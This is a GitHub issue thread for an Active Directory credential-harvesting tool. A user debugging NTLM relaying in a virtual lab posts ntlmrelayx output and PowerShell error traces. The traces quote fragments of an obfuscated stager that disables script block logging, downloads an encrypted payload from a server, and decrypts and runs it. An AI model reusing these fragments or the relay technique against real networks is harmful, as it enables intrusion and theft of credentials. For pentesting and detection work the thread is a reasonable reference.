search

DanMcInerney / icebreaker

Gets plaintext Active Directory credentials if you're on the internal network but outside the AD environment
MIT License
1.18k stars 158 forks source link

Ntlmrlayx.py shows 'SMB SessionError' and throws unhandled exception #18

Closed ss6851 closed 6 years ago

ss6851 commented 6 years ago

I am trying to use ntlm relaying to get domain admin in my virtual environment. However, ntlmrelayx.py first shows 'SMB SessionError' and then throws an un-handled exception.

[*] Authenticating against smb://192.168.106.131 as SAFEDOMAIN\Administrator SUCCEED
[*] Executed specified command on host: 192.168.106.131
[-] SMB SessionError: STATUS_SHARING_VIOLATION(A file cannot be opened because the share access 
flags are incompatible.)
[*] Executed specified command on host: 192.168.106.131
[-] SMB SessionError: STATUS_SHARING_VIOLATION(A file cannot be opened because the share access 
flags are incompatible.)
[*] Executed specified command on host: 192.168.106.131
[-] SMB SessionError: STATUS_SHARING_VIOLATION(A file cannot be opened because the share access 
flags are incompatible.)
[*] Executed specified command on host: 192.168.106.131
Method invocation failed because 
[System.Collections.Generic.Dictionary`2[[System.String, mscorlib, 
Version=4.0.0.0, Culture=neutral, 
PublicKeyToken=b77a5c561934e089],[System.Object, mscorlib, Version=4.0.0.0, 
Culture=neutral, PublicKeyToken=b77a5c561934e089]]] does not contain a method 
named 'nEW'.
At line:1 char:374
+ ... ionLogging']=0}$Val=[CollectIOnS.GEneRIc.DICTioNary[sTRINg,SySTeM.OBjEct]
]::nEW( ...
+                    
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
+ CategoryInfo          : InvalidOperation: (:) [], RuntimeException
+ FullyQualifiedErrorId : MethodNotFound

You cannot call a method on a null-valued expression.
At line:1 char:441
+ ... BjEct]]::nEW();$val.ADd('EnableScriptB'+'lockLogging',0);$vAL.ADd('Enable
ScriptB ...
+                    ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
+ CategoryInfo          : InvalidOperation: (:) [], RuntimeException
+ FullyQualifiedErrorId : InvokeMethodOnNull

You cannot call a method on a null-valued expression.
At line:1 char:483
+ ... ockLogging',0);$vAL.ADd('EnableScriptBlockInvocationLogging',0);$GPC['HKE
Y_LOCAL ...
+                    ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
+ CategoryInfo          : InvalidOperation: (:) [], RuntimeException
+ FullyQualifiedErrorId : InvokeMethodOnNull

 Exception calling "DownloadData" with "1" argument(s): "Unable to connect to 
 the remote server"
 At line:1 char:1657
 + ... uVhm0oeKRKg=");$daTa=$WC.DoWNLoADDAta($SeR+$t);$IV=$daTa[0..3];$Data=$DAt
a[4..$D ...
+                    ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
+ CategoryInfo          : NotSpecified: (:) [], MethodInvocationException
+ FullyQualifiedErrorId : WebException

Cannot index into a null array.
At line:1 char:1689
+ ... 
DDAta($SeR+$t);$IV=$daTa[0..3];$Data=$DAta[4..$DATA.LeNgTH];-jOin[ChAR[]](& $R 
$ ...
+                    ~~~~~~~~~~~~~~~
+ CategoryInfo          : InvalidOperation: (:) [], RuntimeException
+ FullyQualifiedErrorId : NullArray

Cannot index into a null array.
At line:1 char:1705
+ ... IV=$daTa[0..3];$Data=$DAta[4..$DATA.LeNgTH];-jOin[ChAR[]](& $R $DAta 
($IV+$K))|I ...
+                    ~~~~~~~~~~~~~~~~~~~~~~~~~~~~
+ CategoryInfo          : InvalidOperation: (:) [], RuntimeException
+ FullyQualifiedErrorId : NullArray

~ : The term '~' is not recognized as the name of a cmdlet, function, script 
file, or operable program. Check the spelling of the name, or if a path was 
included, verify that the path is correct and try again.
At line:1 char:1
+ ~
+ ~
+ CategoryInfo          : ObjectNotFound: (~:String) [], CommandNotFoundEx 
 ception
+ FullyQualifiedErrorId : CommandNotFoundException
ss6851 commented 6 years ago

Sometimes, for the same setup, ntlmrelay shows the following error:

[-] SMB SessionError: STATUS_ACCESS_DENIED({Access Denied} A process has requested access to an 
object but has not been granted those access rights.)